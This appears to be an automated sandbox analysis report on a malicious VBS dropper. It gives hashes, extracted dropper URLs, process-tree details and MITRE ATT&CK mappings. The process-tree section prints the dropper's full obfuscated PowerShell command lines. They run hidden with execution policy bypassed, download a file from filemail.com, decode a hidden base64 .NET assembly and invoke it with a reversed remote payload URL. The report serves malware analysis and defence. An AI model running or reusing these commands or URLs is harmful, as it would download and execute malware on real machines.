d72fec7ef303edc51d89e59e92743962f4f742d4678f4d01cafb1a110741efb3

General

Target

seemebestthingsonthepartofworldwhichgrrweatfor.vbs
Size

139KB
MD5

1860dcae987d5ed903d93a6cfc698eaf
SHA1

aaee36eb86bd7c80fd0ae9328bea5650f8c74d12
SHA256

d72fec7ef303edc51d89e59e92743962f4f742d4678f4d01cafb1a110741efb3
SHA512

73befb8642d5c9828c6d67bcbcb4b6128410c07e2abbef7ae65a3fa4fc067ee50e7c9c81cf1e2f2b56ddd8cbfa94f20bf56ce3e8848d7a9403a14c8de6d22742
SSDEEP

1536:ewGqea2fZl3q7dC9dpNKVLmlxmxfxGgymuQqDcsCDYgt5pzTNoloGwm:+a2xla7dkdp4saxfwgyRQqDNgt5ptGwm

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2392	powershell.exe
6	2392	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1548	powershell.exe
2392	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1548	powershell.exe
2392	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1548	powershell.exe
Token: SeDebugPrivilege	2392	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 3048 wrote to memory of 1548	3048	WScript.exe	30
PID 3048 wrote to memory of 1548	3048	WScript.exe	30
PID 3048 wrote to memory of 1548	3048	WScript.exe	30
PID 1548 wrote to memory of 2392	1548	powershell.exe	32
PID 1548 wrote to memory of 2392	1548	powershell.exe	32
PID 1548 wrote to memory of 2392	1548	powershell.exe	32

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\seemebestthingsonthepartofworldwhichgrrweatfor.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:3048
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHZFcmJvc2VQckVGZXJFTkNFLlRvU1RSSW5nKClbMSwzXSsnWCctSm9pTicnKSgoKCdJY3BpbWFnZVVybCA9IE9BSWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2QnKyc5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgT0FJO0ljcHdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7SWNwaW1hZ2VCeXRlcyA9IEljcHdlYkNsaWVudCcrJy5Eb3dubG9hZERhdGEoSWNwaW1hZ2VVcmwpO0ljcGltYScrJ2dlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVUJysnRjguR2V0U3RyaW5nKEljcGltYWdlQnl0ZXMpO0ljcHN0YXJ0RmxhZyA9IE9BSTw8QkFTRTY0X1NUQVJUPj5PQUk7SWNwZW5kRmxhZyA9IE9BSTw8QkFTRTY0X0VORD4+T0FJO0ljcHN0YXJ0SW4nKydkZXggPSBJY3BpbWFnZVRleHQuSW5kZXhPZihJY3BzdGFydEZsYWcpO0ljcGVuZEluZGV4ID0gJysnSWNwaW1hZ2VUZXh0LkluZGV4T2YoSWNwZW5kRmxhZyknKyc7SWNwc3RhcnRJbmRleCAtZ2UgMCAtYW5kIEljcGVuZEluZGV4IC1ndCBJY3BzdGFydEluZGV4O0ljcHN0YXJ0SW5kZXggKz0gSWNwc3RhcnRGbGFnLkxlbicrJ2d0aDtJY3BiYXNlNjRMZW5ndGggPSBJY3BlbmRJbmRleCAtIEljcHN0YScrJ3J0SW4nKydkZXg7SWNwYmEnKydzZTY0Q29tbWFuZCA9IEljcGltYWdlVGV4dC5TdWJzdHJpbmcoSWNwc3RhcnRJbmRleCwgSWNwYmFzZTY0TGVuZ3RoKTtJY3BiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChJY3BiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMTR1IEZvckVhY2gtTycrJ2JqZWN0IHsgSWNwXyB9KVstMScrJy4uLShJY3BiYXNlNjRDb21tYW5kLkxlbicrJ2d0aCldO0ljcGNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoSWNwYmFzZTYnKyc0UmV2ZXJzZWQpO0ljcGxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChJY3AnKydjb21tYW5kQnl0ZXMpO0ljJysncHZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoT0FJVkFJT0FJKTtJY3B2JysnYWlNZXRobycrJ2QuSW52b2tlKEljcG51bGwsIEAnKycoTycrJ0FJdHh0LkRFRERFV0VTLzU1LzI5MS44NzEuNjQuODkxLy86cHR0aE9BSSwnKycgT0FJZGUnKydzYXRpdmFkb09BSSwgT0FJZGVzYXRpdmEnKydkb09BSSwgT0FJZGVzYXRpdmFkb09BSSwgT0FJQ2EnKydzUG9sT0FJLCAnKydPQUlkZXNhdGl2YWRvT0FJLCBPQUlkZXNhdGl2YWRvT0FJLE9BSWRlc2F0aXZhZG9PQUksT0FJZGVzYXRpdmFkb09BSSxPQUlkZXNhdGl2YWRvT0FJLE9BSWRlc2F0aXZhZG9PQUksT0FJZGVzYXRpdmFkb09BSSxPQUkxT0FJLE9BSWRlc2F0aXZhZG9PQUkpKTsnKSAtUmVwTEFjRSAoW0NoYVJdNDkrW0NoYVJdNTIrW0NoYVJdMTE3KSxbQ2hhUl0xMjQgIC1jcmVwbEFDRSdPQUknLFtDaGFSXTM5IC1jcmVwbEFDRShbQ2hhUl03MytbQ2hhUl05OStbQ2hhUl0xMTIpLFtDaGFSXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1548
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $vErbosePrEFerENCE.ToSTRIng()[1,3]+'X'-JoiN'')((('IcpimageUrl = OAIhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd'+'9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f OAI;IcpwebClient = New-Object System.Net.WebClient;IcpimageBytes = IcpwebClient'+'.DownloadData(IcpimageUrl);Icpima'+'geText = [System.Text.Encoding]::UT'+'F8.GetString(IcpimageBytes);IcpstartFlag = OAI<<BASE64_START>>OAI;IcpendFlag = OAI<<BASE64_END>>OAI;IcpstartIn'+'dex = IcpimageText.IndexOf(IcpstartFlag);IcpendIndex = '+'IcpimageText.IndexOf(IcpendFlag)'+';IcpstartIndex -ge 0 -and IcpendIndex -gt IcpstartIndex;IcpstartIndex += IcpstartFlag.Len'+'gth;Icpbase64Length = IcpendIndex - Icpsta'+'rtIn'+'dex;Icpba'+'se64Command = IcpimageText.Substring(IcpstartIndex, Icpbase64Length);Icpbase64Reversed = -join (Icpbase64Command.ToCharArray() 14u ForEach-O'+'bject { Icp_ })[-1'+'..-(Icpbase64Command.Len'+'gth)];IcpcommandBytes = [Syst'+'em.Convert]::FromBase64String(Icpbase6'+'4Reversed);IcploadedAssembly = [System.Reflection.Assembly]::Load(Icp'+'commandBytes);Ic'+'pvaiMethod = [dnlib.IO.Home].GetMethod(OAIVAIOAI);Icpv'+'aiMetho'+'d.Invoke(Icpnull, @'+'(O'+'AItxt.DEDDEWES/55/291.871.64.891//:ptthOAI,'+' OAIde'+'sativadoOAI, OAIdesativa'+'doOAI, OAIdesativadoOAI, OAICa'+'sPolOAI, '+'OAIdesativadoOAI, OAIdesativadoOAI,OAIdesativadoOAI,OAIdesativadoOAI,OAIdesativadoOAI,OAIdesativadoOAI,OAIdesativadoOAI,OAI1OAI,OAIdesativadoOAI));') -RepLAcE ([ChaR]49+[ChaR]52+[ChaR]117),[ChaR]124 -creplACE'OAI',[ChaR]39 -creplACE([ChaR]73+[ChaR]99+[ChaR]112),[ChaR]36) )"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2392

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
c3a95ed9d5779c99c47ce25df772f312

SHA1
710a3a9ad466eae921d8d24bfd6b9a0bd2fe5609

SHA256
8e8f7822ffbf8e54bef802777e995f1c0170116ab70db183f15b16a4838aa273

SHA512
7cf83ef5a6568c01c09dc6a0297feca6169046dbc9db0c5e50c6c70e1ada36dfba8b37881777591ed441a686155d1aef53b562622c108152f0da975bf4cbc823

Download Submit
memory/1548-4-0x000007FEF5E6E000-0x000007FEF5E6F000-memory.dmp

Filesize
4KB

Download
memory/1548-5-0x000000001B700000-0x000000001B9E2000-memory.dmp

Filesize
2.9MB

Download
memory/1548-6-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/1548-12-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

Filesize
9.6MB

Download
memory/1548-13-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing